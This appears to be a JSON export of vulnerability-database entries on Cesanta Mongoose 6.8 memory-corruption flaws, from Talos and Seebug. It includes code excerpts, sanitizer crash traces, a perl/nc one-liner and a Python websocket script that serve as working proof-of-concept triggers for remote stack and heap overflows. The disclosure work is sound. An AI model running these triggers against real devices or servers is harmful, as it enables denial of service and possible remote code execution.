{"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-31T00:00:00", "type": "talos", "title": "Cesanta Mongoose Websocket Protocol Fragmented Packet Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2922"], "modified": "2017-10-31T00:00:00", "id": "TALOS-2017-0429", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0429", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-07T19:10:18", "description": "### Summary\n\nAn exploitable stack buffer overflow vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause a stack buffer overflow resulting in remote code execution. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.\n\n### Tested Versions\n\nCesanta Mongoose 6.8\n\n### Product URLs\n\n<https://cesanta.com/>\n\n### CVSSv3 Score\n\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-121: Stack-based Buffer Overflow\n\n### Details\n\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\n\nMQTT SUBSCRIBE command packet can contain multiple topics to subscribe to. If a MQTT SUBSCRIBE packet with upwards of 512 topic subscriptions is sent to the server, an overflow of a stack buffer can lead to an overwrite of adjacent variables or the return address ultimately leading to remote code execution. In function `mg_mqtt_broker_handle_subscribe` topics are handled one by one:\n \n \n uint8_t qoss[512]; [1]\n size_t qoss_len = 0;\n struct mg_str topic;\n uint8_t qos;\n int pos;\n struct mg_mqtt_topic_expression *te;\n \n for (pos = 0;\n (pos = mg_mqtt_next_subscribe_topic(msg, &topic, &qos, pos)) != -1;) {\n qoss[qoss_len++] = qos; [2]\n \n\nIn the above code, an array of 512 bytes is allocated at [1]. Then, in a for loop at [2] the QOS value is stored inside that buffer and an index is incremented. No check to make sure that `qoss_len` doesn\u2019t overflow is present, so a SUBSCRIBE with more than 512 subscriptions will overflow the array and write past it corrupting the stack frame.\n\nThis vulnerability can be triggered by running the supplied proof of concept to the sample `mqtt_broker` application supplied with the library.\n\n### Crash Information\n \n \n Address Sanitizer output:\n \n ==120239==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffb2d0 at pc 0x00000051c985 bp 0x7fffffffaff0 sp \n 0x7fffffffafe8\n WRITE of size 1 at 0x7fffffffb2d0 thread T0\n #0 0x51c984 in mg_mqtt_broker_handle_subscribe /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:10031\n #1 0x51c984 in mg_mqtt_broker /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:10112\n #2 0x51c984 in ?? ??:0\n #3 0x513e76 in mqtt_handler /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:9701\n #4 0x513e76 in ?? ??:0\n #5 0x4fa245 in mg_call /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:2051\n #6 0x4fa245 in ?? ??:0\n #7 0x4fe437 in mg_recv_common /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:2502\n #8 0x4fe437 in ?? ??:0\n #9 0x50a307 in mg_if_recv_tcp_cb /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:2506\n #10 0x50a307 in mg_handle_tcp_read /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:3372\n #11 0x50a307 in mg_mgr_handle_conn /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:3497\n #12 0x50a307 in ?? ??:0\n #13 0x50e9c8 in mg_socket_if_poll /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:3690\n #14 0x50e9c8 in ?? ??:0\n #15 0x4fbb65 in mg_mgr_poll /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:2232\n #16 0x4fbb65 in ?? ??:0\n #17 0x4eaffa in main /home/user/mongoose/examples/mqtt_broker/mqtt_broker.c:43\n #18 0x4eaffa in ?? ??:0\n #19 0x7ffff683882f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291\n #20 0x7ffff683882f in ?? ??:0\n #21 0x419848 in _start ??:?\n #22 0x419848 in ?? ??:0\n \n \n Address 0x7fffffffb2d0 is located in stack of thread T0 at offset 720 in frame\n #0 0x51c61f in mg_mqtt_broker /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:10093\n #1 0x51c61f in ?? ??:0\n \n\nThis frame has 3 object(s): [32, 132) \u2018buf.i\u2019 [176, 184) \u2018p.i\u2019 [208, 720) \u2018qoss.i\u2019 <== Memory access at offset 720 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions _are_ supported) SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x51c984) Shadow bytes around the buggy address: 0x10007fff7600: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7610: 04 f2 f2 f2 f2 f2 00 f2 f2 f2 00 00 00 00 00 00 0x10007fff7620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10007fff7650: 00 00 00 00 00 00 00 00 00 00[f3]f3 f3 f3 f3 f3 0x10007fff7660: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7680: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00 0x10007fff7690: 00 00 00 00 00 00 00 00 00 00 f3 f3 f3 f3 f3 f3 0x10007fff76a0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==120239==ABORTING\n\n### Exploit Proof-of-Concept\n\nperl -e \u2018print \u201c\\x80\\xff\\x0f\u201d . \u201c\\x00\\x00\\x00\\x01a\\x02\\x00\u201dx400 \u2018 | nc \n---|--- \n \n### Timeline\n\n2017-08-31 - Vendor Disclosure \n2017-10-30 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-31T00:00:00", "type": "talos", "title": "Cesanta Mongoose MQTT SUBSCRIBE Multiple Topics Remote Code Execution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2894"], "modified": "2017-10-31T00:00:00", "id": "TALOS-2017-0401", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0401", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T11:55:42", "description": "### Summary\r\nAn exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow resulting leading to heap buffer overflow resulting in denial of service and potential remote code execution. An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nCesanta Mongoose 6.8\r\n\r\n### Product URLs\r\nhttps://cesanta.com/\r\n\r\n### CVSSv3 Score\r\n8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-190: Integer Overflow or Wraparound\r\n\r\n### Details\r\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. Its HTTP implementation includes upgrade support required for websocket applications. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\r\n\r\nAfter the initial websocket handshake and while parsing a websocket packet, an integer overflow involving header length and packet size can occur. Insufficient checks after the potential overflow can later lead to very large memory overwrite which can result in heap memory corruption, process crash and potentially in remote code execution.\r\n\r\nFunction `mg_deliver_websocket_data` is responsible for parsing the websocket packet. Relevant code is:\r\n```\r\nuint64_t i, data_len = 0, frame_len = 0, buf_len = nc->recv_mbuf.len, len, [1]\r\n mask_len = 0, header_len = 0;\r\n ...\r\n if (buf_len >= 2) \r\n ...\r\n else if (buf_len >= 10 + mask_len) \r\n header_len = 10 + mask_len; [2]\r\n data_len = (((uint64_t) ntohl(*(uint32_t *) &buf[2])) << 32) + [3]\r\n ntohl(*(uint32_t *) &buf[6]);\r\n\r\n\r\n\r\nframe_len = header_len + data_len; [4]\r\n ok = frame_len > 0 && frame_len <= buf_len; [5]\r\n\r\n if (ok) \r\n ...\r\n /* Apply mask if necessary */\r\n if (mask_len > 0) { \r\n for (i = 0; i < data_len; i++) \r\n buf[i + header_len] ^= (buf + header_len - mask_len)[i % 4]; [6]\r\n```\r\n\r\nIn the above code, we can see at [1] local variables `frame_len`, `header_len` and `data_len` being declared as 64bit unsigned integers. At [2] header length is calculated since websocket protocol specifies variable length headers. At [3], 8 bytes from the packet are used as `data_len` directly. At [4], total `frame_len` is calculated and at [5] basic sanity checks are performed. If everything is ok, and the packet has mask bit set, at [6] all the data in the buffer is XORed with 4 byte mask.\r\n\r\nAn insufficient check above at [5] can allow for an integer overflow to pass undetected. In case `data_len` is a very large value, adding header_len to it can lead to integer wraparound , resulting in small `frame_len` value. Small `frame_len` value passes `frame_len` <= buf_len check, while data_len is still huge and bigger than the actual buffer size. This results in a large heap overflow at [6] as the for loop is bounded by `data_len` only.\r\n\r\nThis causes the process to crash, leading to denial of service and in some cases potentially to remote code execution.\r\n\r\n### Crash Information\r\n```\r\nAddress sanitizer output:\r\n\r\n==88164==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000006380 at pc 0x00000051abae bp 0x7fffffffb490 sp \r\n0x7fffffffb488\r\nREAD of size 1 at 0x619000006380 thread T0\r\n #0 0x51abad in mg_deliver_websocket_data /home/user/mongoose/examples/websocket_chat/../../mongoose.c:8866\r\n #1 0x51abad in ?? ??:0\r\n #2 0x5128d4 in mg_ws_handler /home/user/mongoose/examples/websocket_chat/../../mongoose.c:9045 (discriminator 1)\r\n #3 0x5128d4 in ?? ??:0\r\n #4 0x4f9de6 in mg_call /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2051\r\n #5 0x4f9de6 in ?? ??:0\r\n #6 0x4fdcf9 in mg_recv_common /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2502\r\n #7 0x4fdcf9 in ?? ??:0\r\n #8 0x506603 in mg_if_recv_tcp_cb /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2506\r\n #9 0x506603 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3372\r\n #10 0x506603 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497\r\n #11 0x506603 in ?? ??:0\r\n #12 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\r\n #13 0x509dd8 in ?? ??:0\r\n #14 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\r\n #15 0x4fb695 in ?? ??:0\r\n #16 0x4ea65a in main /home/user/mongoose/examples/websocket_chat/websocket_chat.c:78\r\n #17 0x4ea65a in ?? ??:0\r\n #18 0x7ffff6ee582f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291\r\n #19 0x7ffff6ee582f in ?? ??:0\r\n #20 0x418e58 in _start ??:?\r\n #21 0x418e58 in ?? ??:0\r\n\r\n\r\n0x619000006380 is located 0 bytes to the right of 1024-byte region [0x619000005f80,0x619000006380)\r\nallocated by thread T0 here:\r\n #0 0x4b8f88 in __interceptor_malloc ??:?\r\n #1 0x4b8f88 in ?? ??:0\r\n #2 0x506453 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3336 (discriminator 1)\r\n #3 0x506453 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497 (discriminator 1)\r\n #4 0x506453 in ?? ??:0\r\n #5 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\r\n #6 0x509dd8 in ?? ??:0\r\n #7 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\r\n #8 0x4fb695 in ?? ??:0\r\n #4 0x60200000efef (<unknown module>)\r\n\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow (/home/user/mongoose/examples/websocket_chat/websocket_chat+0x51abad)\r\nShadow bytes around the buggy address:\r\n0x0c327fff8c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n0x0c327fff8c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n0x0c327fff8c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n0x0c327fff8c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n0x0c327fff8c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c327fff8c70:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n0x0c327fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n0x0c327fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n0x0c327fff8ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n0x0c327fff8cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n0x0c327fff8cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\nAddressable: 00\r\nPartially addressable: 01 02 03 04 05 06 07\r\nHeap left redzone: fa\r\nHeap right redzone: fb\r\nFreed heap region: fd\r\nStack left redzone: f1\r\nStack mid redzone: f2\r\nStack right redzone: f3\r\nStack partial redzone: f4\r\nStack after return: f5\r\nStack use after scope: f8\r\nGlobal redzone: f9\r\nGlobal init order: f6\r\nPoisoned by user: f7\r\nContainer overflow: fc\r\nArray cookie: ac\r\nIntra object redzone: bb\r\nASan internal: fe\r\nLeft alloca redzone: ca\r\nRight alloca redzone: cb\r\n==88164==ABORTING\r\n```\r\n\r\n### Timeline\r\n* 2017-08-30 - Vendor Disclosure\r\n* 2017-10-31 - Public Release", "cvss3": {}, "published": "2017-11-08T00:00:00", "type": "seebug", "title": "Cesanta Mongoose Websocket Protocol Packet Length Code Execution Vulnerability(CVE-2017-2921)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2921"], "modified": "2017-11-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96808", "id": "SSV:96808", "sourceData": "\n import socket\r\nimport struct\r\nimport sys\r\nhttp_upgrade = ('GET /chat HTTP/1.1\\r\\n'\r\n 'Host: server.example.com\\r\\n'\r\n 'Upgrade: websocket\\r\\n'\r\n 'Connection: Upgrade\\r\\n'\r\n 'Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\\r\\n'\r\n 'Sec-WebSocket-Protocol: chat, superchat\\r\\n'\r\n 'Sec-WebSocket-Version: 13\\r\\n'\r\n 'Origin: http://example.com\\r\\n\\r\\n')\r\n#only HTTP \"Upgrade: websocket\" header matters above, the above GET request was copied verbatim from wikipedia\r\n\r\n\r\npayload = \"\\x00\" # FIN flag doesn't matter, opcode doesn't matter\r\npayload += chr(0x80 | 127 ) # mask is set, payload len of 127 means next 64 bits are actual payload len\r\npayload_len = 0xffffffffffffffff -12 #actual payload len\r\npayload += struct.pack(\"!Q\",payload_len)\r\nmasking_key = 0 #masking key can be anything, and would need to be a specific value in real exploit\r\npayload += struct.pack(\"I\",masking_key)\r\npayload += \"A\"*40 #garbage to pad the packet\r\n\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((sys.argv[1],int(sys.argv[2])))\r\ns.send(http_upgrade)\r\nprint s.recv(1024)\r\ns.send(payload)\r\nprint s.recv(1024)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96808", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T13:06:31", "description": "### Summary\r\nAn exploitable use-after-free vulnerability exists in the HTTP server implementation of Cesanta Mongoose 6.8. An ordinary HTTP POST request with a CGI target can cause a reuse of previously freed pointer potentially resulting in remote code execution. An attacker needs to send this HTTP request over network to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nCesanta Mongoose 6.8\r\n\r\n### Product URLs\r\nhttps://cesanta.com/\r\n\r\n### CVSSv3 Score\r\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-416: Use After Free\r\n\r\n### Details\r\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\r\n\r\nWhile parsing a specific type of POST request that targets a CGI script, a use-after-free vulnerability is triggered, if compiled with CGI support which is the default. When doing the initial parsing, a structure of type `mg_connection` is allocated in function `mg_create_connection_base`. Then, while working on a reply and since this is a CGI request (target of the request just needs to end with set CGI extension, \u201c.cgi\u201d by default), a CGI handler is invoked in the function `mg_send_http_file`:\r\n```\r\n} else if (is_cgi) {\r\n#if MG_ENABLE_HTTP_CGI\r\n mg_handle_cgi(nc, index_file ? index_file : path, path_info, hm, opts);\r\n#else\r\n```\r\n\r\nIn function `mg_handle_cgi` a new connection structure is allocated and a previous one is added to it:\r\n```\r\n struct mg_connection *cgi_nc =\r\n mg_add_sock(nc->mgr, fds[0], mg_cgi_ev_handler); [1]\r\n struct mg_http_proto_data *cgi_pd = mg_http_get_proto_data(nc); \r\n cgi_pd->cgi.cgi_nc = cgi_nc;\r\n cgi_pd->cgi.cgi_nc->user_data = nc; [2]\r\n nc->flags |= MG_F_USER_1;\r\n```\r\n\r\nIn above code, at [1], a new connection structure is created and at [2], the old `nc` is set as the `user_data` field. Since the initial client connection is deemed done, it\u2019s being cleaned and the first `mg_connection` structure is freed by calling `mg_close_conn` in function `mg_socket_if_poll`. This leaves the `cgi_pd->cgi.cgi_nc->user_data` pointer set at [2] pointing to freed memory. Then, when executing the actual CGI event handler function `mg_cgi_ev_handler` this freed data will be accessed in different places depending on the event:\r\n```\r\nstatic void mg_cgi_ev_handler(struct mg_connection *cgi_nc, int ev,\r\n void *ev_data) {\r\n struct mg_connection *nc = (struct mg_connection *) cgi_nc->user_data; [3]\r\n\r\n\r\n...\r\n case MG_EV_CLOSE:\r\n mg_http_free_proto_data_cgi(&mg_http_get_proto_data(nc)->cgi); [4]\r\n nc->flags |= MG_F_SEND_AND_CLOSE;\r\n Break;\r\n```\r\n\r\nIn the above code, at [3] the pointer to the original connection structure is retrieved (which at this time points to freed memory) and is dereferenced at [4] which ultimately leads to read and write over unallocated memory. If a second request happens at the right time, this freed memory might contain different data or point to other structures leading to server crash and potential remote code execution with multiple carefully controlled post requests.\r\n\r\nThis vulnerability can be demonstrated via the example web server application supplied with the library. Since the server may not immediately crash, the vulnerability can be observed by running the server under memory debugger such as valgrind or AddressSanitizer.\r\n\r\n### Crash Information\r\n```\r\nValgrind output:\r\n\r\n==87342== Memcheck, a memory error detector\r\n==87342== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.\r\n==87342== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info\r\n==87342== Command: ./simplest_web_server\r\n==87342== \r\n==87342== Invalid read of size 8\r\n==87342== at 0x40BD62: mg_http_get_proto_data (mongoose.c:5054)\r\n==87342== by 0x4138DD: mg_cgi_ev_handler (mongoose.c:8249)\r\n==87342== by 0x406FD9: mg_call (mongoose.c:2051)\r\n==87342== by 0x407318: mg_close_conn (mongoose.c:2108)\r\n==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\r\n==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\r\n==87342== by 0x4020C2: main (simplest_web_server.c:33)\r\n==87342== Address 0x5421728 is 136 bytes inside a block of size 208 free'd\r\n==87342== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==87342== by 0x407289: mg_destroy_conn (mongoose.c:2101)\r\n==87342== by 0x407329: mg_close_conn (mongoose.c:2109)\r\n==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\r\n==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\r\n==87342== by 0x4020C2: main (simplest_web_server.c:33)\r\n==87342== Block was alloc'd at\r\n==87342== at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==87342== by 0x4078F2: mg_create_connection_base (mongoose.c:2303)\r\n==87342== by 0x4079DC: mg_create_connection (mongoose.c:2328)\r\n==87342== by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)\r\n==87342== by 0x409A9F: mg_accept_conn (mongoose.c:3202)\r\n==87342== by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)\r\n==87342== by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)\r\n==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\r\n==87342== by 0x4020C2: main (simplest_web_server.c:33)\r\n==87342== \r\n==87342== Invalid write of size 8\r\n==87342== at 0x40BD84: mg_http_get_proto_data (mongoose.c:5055)\r\n==87342== by 0x4138DD: mg_cgi_ev_handler (mongoose.c:8249)\r\n==87342== by 0x406FD9: mg_call (mongoose.c:2051)\r\n==87342== by 0x407318: mg_close_conn (mongoose.c:2108)\r\n==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\r\n==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\r\n==87342== by 0x4020C2: main (simplest_web_server.c:33)\r\n==87342== Address 0x5421728 is 136 bytes inside a block of size 208 free'd\r\n==87342== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==87342== by 0x407289: mg_destroy_conn (mongoose.c:2101)\r\n==87342== by 0x407329: mg_close_conn (mongoose.c:2109)\r\n==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\r\n==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\r\n==87342== by 0x4020C2: main (simplest_web_server.c:33)\r\n==87342== Block was alloc'd at\r\n==87342== at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==87342== by 0x4078F2: mg_create_connection_base (mongoose.c:2303)\r\n==87342== by 0x4079DC: mg_create_connection (mongoose.c:2328)\r\n==87342== by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)\r\n==87342== by 0x409A9F: mg_accept_conn (mongoose.c:3202)\r\n==87342== by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)\r\n==87342== by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)\r\n==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\r\n==87342== by 0x4020C2: main (simplest_web_server.c:33)\r\n==87342== \r\n==87342== Invalid write of size 8\r\n==87342== at 0x40BD8F: mg_http_get_proto_data (mongoose.c:5056)\r\n==87342== by 0x4138DD: mg_cgi_ev_handler (mongoose.c:8249)\r\n==87342== by 0x406FD9: mg_call (mongoose.c:2051)\r\n==87342== by 0x407318: mg_close_conn (mongoose.c:2108)\r\n==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\r\n==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\r\n==87342== by 0x4020C2: main (simplest_web_server.c:33)\r\n==87342== Address 0x5421730 is 144 bytes inside a block of size 208 free'd\r\n==87342== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==87342== by 0x407289: mg_destroy_conn (mongoose.c:2101)\r\n==87342== by 0x407329: mg_close_conn (mongoose.c:2109)\r\n==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\r\n==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\r\n==87342== by 0x4020C2: main (simplest_web_server.c:33)\r\n==87342== Block was alloc'd at\r\n==87342== at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==87342== by 0x4078F2: mg_create_connection_base (mongoose.c:2303)\r\n==87342== by 0x4079DC: mg_create_connection (mongoose.c:2328)\r\n==87342== by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)\r\n==87342== by 0x409A9F: mg_accept_conn (mongoose.c:3202)\r\n==87342== by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)\r\n==87342== by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)\r\n==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\r\n==87342== by 0x4020C2: main (simplest_web_server.c:33)\r\n==87342== \r\n==87342== Invalid read of size 8\r\n==87342== at 0x40BD9E: mg_http_get_proto_data (mongoose.c:5059)\r\n==87342== by 0x4138DD: mg_cgi_ev_handler (mongoose.c:8249)\r\n==87342== by 0x406FD9: mg_call (mongoose.c:2051)\r\n==87342== by 0x407318: mg_close_conn (mongoose.c:2108)\r\n==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\r\n==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\r\n==87342== by 0x4020C2: main (simplest_web_server.c:33)\r\n==87342== Address 0x5421728 is 136 bytes inside a block of size 208 free'd\r\n==87342== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==87342== by 0x407289: mg_destroy_conn (mongoose.c:2101)\r\n==87342== by 0x407329: mg_close_conn (mongoose.c:2109)\r\n==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\r\n==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\r\n==87342== by 0x4020C2: main (simplest_web_server.c:33)\r\n==87342== Block was alloc'd at\r\n==87342== at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==87342== by 0x4078F2: mg_create_connection_base (mongoose.c:2303)\r\n==87342== by 0x4079DC: mg_create_connection (mongoose.c:2328)\r\n==87342== by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)\r\n==87342== by 0x409A9F: mg_accept_conn (mongoose.c:3202)\r\n==87342== by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)\r\n==87342== by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)\r\n==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\r\n==87342== by 0x4020C2: main (simplest_web_server.c:33)\r\n==87342== \r\n==87342== Invalid read of size 8\r\n==87342== at 0x4138F1: mg_cgi_ev_handler (mongoose.c:8250)\r\n==87342== by 0x406FD9: mg_call (mongoose.c:2051)\r\n==87342== by 0x407318: mg_close_conn (mongoose.c:2108)\r\n==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\r\n==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\r\n==87342== by 0x4020C2: main (simplest_web_server.c:33)\r\n==87342== Address 0x5421768 is 200 bytes inside a block of size 208 free'd\r\n==87342== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==87342== by 0x407289: mg_destroy_conn (mongoose.c:2101)\r\n==87342== by 0x407329: mg_close_conn (mongoose.c:2109)\r\n==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\r\n==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\r\n==87342== by 